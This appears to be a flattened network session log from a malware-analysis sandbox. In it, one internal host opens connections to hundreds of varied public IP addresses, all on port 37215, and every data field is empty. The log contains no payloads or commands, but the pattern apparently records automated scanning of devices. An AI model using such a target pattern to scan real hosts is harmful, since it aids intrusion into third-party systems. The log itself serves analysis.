                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19557192.168.2.153927441.196.123.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19558192.168.2.154178241.210.40.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19559192.168.2.156092641.226.9.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19560192.168.2.154957041.24.238.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19561192.168.2.154236841.171.232.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19562192.168.2.155820241.98.199.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19563192.168.2.155545441.131.237.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19564192.168.2.153462241.118.199.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19565192.168.2.155800041.224.239.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19566192.168.2.155278441.222.161.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19567192.168.2.154914441.230.168.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19568192.168.2.155292041.16.27.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19569192.168.2.155279841.119.223.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19570192.168.2.154919441.107.124.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19571192.168.2.155480241.87.214.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19572192.168.2.155562641.132.89.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19573192.168.2.154885041.31.57.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19574192.168.2.156050641.57.86.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19575192.168.2.156051441.63.36.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19576192.168.2.155684441.120.192.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19577192.168.2.154663641.241.116.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19578192.168.2.154168441.171.234.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19579192.168.2.153343441.217.117.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19580192.168.2.153287041.181.238.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19581192.168.2.154449841.245.76.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19582192.168.2.155992041.194.100.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19583192.168.2.153902641.56.176.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19584192.168.2.154229241.102.55.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19585192.168.2.153482441.172.5.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19586192.168.2.155531841.3.47.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19587192.168.2.155283441.68.27.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19588192.168.2.153532641.61.196.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19589192.168.2.154388441.84.246.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19590192.168.2.156080641.124.162.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19591192.168.2.155431441.179.40.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19592192.168.2.153676441.62.181.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19593192.168.2.153760841.127.163.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19594192.168.2.155914641.180.50.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19595192.168.2.154767241.228.49.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19596192.168.2.155354041.240.252.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19597192.168.2.155970241.71.47.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19598192.168.2.155948041.101.90.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19599192.168.2.155135241.239.229.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19600192.168.2.155390241.229.206.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19601192.168.2.153639241.181.224.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19602192.168.2.154085641.34.40.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19603192.168.2.154344441.235.232.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19604192.168.2.154331641.173.218.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19605192.168.2.156075041.4.135.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19606192.168.2.154867241.147.166.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19607192.168.2.153407641.172.170.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19608192.168.2.154231641.124.55.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19609192.168.2.154952641.134.91.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19610192.168.2.155412641.146.139.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19611192.168.2.154535241.250.88.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19612192.168.2.154328841.144.66.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19613192.168.2.154532041.19.67.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19614192.168.2.153665441.251.203.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19615192.168.2.155971441.231.73.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19616192.168.2.156045641.35.202.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19617192.168.2.154143841.180.59.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19618192.168.2.153668641.52.0.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19619192.168.2.154183441.191.193.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19620192.168.2.154586041.23.161.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19621192.168.2.153514441.106.245.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19622192.168.2.154115841.238.117.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19623192.168.2.155040441.125.159.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19624192.168.2.156065441.76.106.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19625192.168.2.155910841.206.159.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19626192.168.2.154699841.166.71.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19627192.168.2.153648441.173.101.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19628192.168.2.154609241.115.245.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19629192.168.2.155715641.144.139.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19630192.168.2.154635441.128.119.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19631192.168.2.153892241.173.58.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19632192.168.2.153465441.87.82.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19633192.168.2.153929841.199.164.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19634192.168.2.155961441.96.19.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19635192.168.2.153687241.232.190.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19636192.168.2.155770241.16.85.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19637192.168.2.156009641.80.158.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19638192.168.2.154576241.164.214.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19639192.168.2.154720041.194.252.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19640192.168.2.156039441.33.79.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19641192.168.2.155966841.61.152.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19642192.168.2.155212241.73.44.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19643192.168.2.153942441.71.96.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19644192.168.2.153671441.20.155.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19645192.168.2.155280641.180.134.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19646192.168.2.154030041.205.25.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19647192.168.2.155564841.79.94.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19648192.168.2.155663641.140.181.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19649192.168.2.154861841.147.113.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19650192.168.2.153322641.156.221.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19651192.168.2.155374241.58.105.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19652192.168.2.156098041.232.144.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19653192.168.2.155409041.5.212.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19654192.168.2.155550041.204.80.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19655192.168.2.153725241.118.233.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19656192.168.2.155368441.30.191.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19657192.168.2.154418841.195.111.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19658192.168.2.155072441.183.16.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19659192.168.2.155416041.106.176.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19660192.168.2.154646041.192.159.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19661192.168.2.153777441.153.234.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19662192.168.2.153634241.60.151.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19663192.168.2.155436041.102.203.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19664192.168.2.153509041.148.192.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19665192.168.2.154267441.204.54.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19666192.168.2.155129241.159.106.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19667192.168.2.153322841.156.238.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19668192.168.2.155940241.25.179.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19669192.168.2.155829841.205.221.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19670192.168.2.155615241.221.88.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19671192.168.2.1542822197.215.172.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19672192.168.2.1546420197.106.98.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19673192.168.2.1558384197.90.166.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19674192.168.2.1545896197.252.0.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19675192.168.2.1532814197.35.8.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19676192.168.2.1556402197.215.192.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19677192.168.2.1554946197.160.0.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19678192.168.2.1540686197.36.227.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19679192.168.2.1551888197.100.188.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19680192.168.2.1558612197.221.121.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19681192.168.2.1534372197.145.79.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19682192.168.2.1541670197.147.93.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19683192.168.2.1548886197.68.112.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19684192.168.2.1532900197.197.56.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19685192.168.2.1543110197.119.194.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19686192.168.2.1559728197.163.68.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19687192.168.2.1534560197.68.127.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19688192.168.2.1539440197.38.132.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19689192.168.2.1559376197.143.136.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19690192.168.2.1549844197.149.253.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19691192.168.2.1536210197.192.182.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19692192.168.2.1542430197.3.223.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19693192.168.2.1553228197.190.254.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19694192.168.2.1556952197.223.198.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19695192.168.2.1559308197.211.24.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19696192.168.2.1543390197.203.47.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19697192.168.2.1534936197.135.10.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19698192.168.2.1542620197.16.110.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19699192.168.2.1534250197.205.65.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19700192.168.2.1558428197.41.221.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19701192.168.2.1545508197.54.96.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19702192.168.2.1536278197.152.32.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19703192.168.2.1559994197.172.93.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19704192.168.2.1544918197.243.65.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19705192.168.2.1537112197.3.146.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19706192.168.2.1557662197.152.210.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19707192.168.2.1554460197.127.68.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19708192.168.2.1544294197.166.212.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19709192.168.2.1544406197.67.67.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19710192.168.2.1544486197.120.6.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19711192.168.2.1548370197.29.222.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19712192.168.2.1559048197.228.80.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19713192.168.2.1543928197.176.239.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19714192.168.2.1542540197.94.153.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19715192.168.2.1533534197.104.219.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19716192.168.2.1559128197.91.12.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19717192.168.2.1550346197.95.227.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19718192.168.2.1533596197.32.145.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19719192.168.2.1539154197.106.243.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19720192.168.2.1537752197.5.39.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19721192.168.2.1548806197.14.80.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19722192.168.2.1557036197.255.72.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19723192.168.2.1545404197.42.198.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19724192.168.2.1551984197.212.31.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19725192.168.2.1541372197.125.205.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19726192.168.2.1547796197.153.225.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19727192.168.2.1547304197.137.41.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19728192.168.2.1544620197.19.206.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19729192.168.2.1537674197.220.173.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19730192.168.2.1543502197.163.61.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19731192.168.2.1557402197.225.8.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19732192.168.2.1558928197.167.141.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19733192.168.2.1546870197.242.213.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19734192.168.2.1538944197.38.203.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19735192.168.2.1544900197.222.208.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19736192.168.2.1541264197.216.24.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19737192.168.2.1538034197.97.236.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19738192.168.2.1547318197.122.61.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19739192.168.2.1559148197.170.23.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19740192.168.2.1560474197.160.103.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19741192.168.2.1560156197.245.246.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19742192.168.2.1535216197.158.140.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19743192.168.2.1535306197.114.81.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19744192.168.2.1550566197.28.202.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19745192.168.2.1542238197.160.24.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19746192.168.2.1558102197.194.106.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19747192.168.2.1552250197.229.15.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19748192.168.2.1559496197.19.19.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19749192.168.2.1549426197.217.86.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19750192.168.2.1542874197.185.244.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19751192.168.2.1539378197.41.231.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19752192.168.2.1553100197.155.172.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19753192.168.2.1552026197.237.94.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19754192.168.2.1556606197.143.126.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19755192.168.2.1550602197.99.242.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19756192.168.2.1543304197.237.224.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19757192.168.2.1542874197.238.52.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
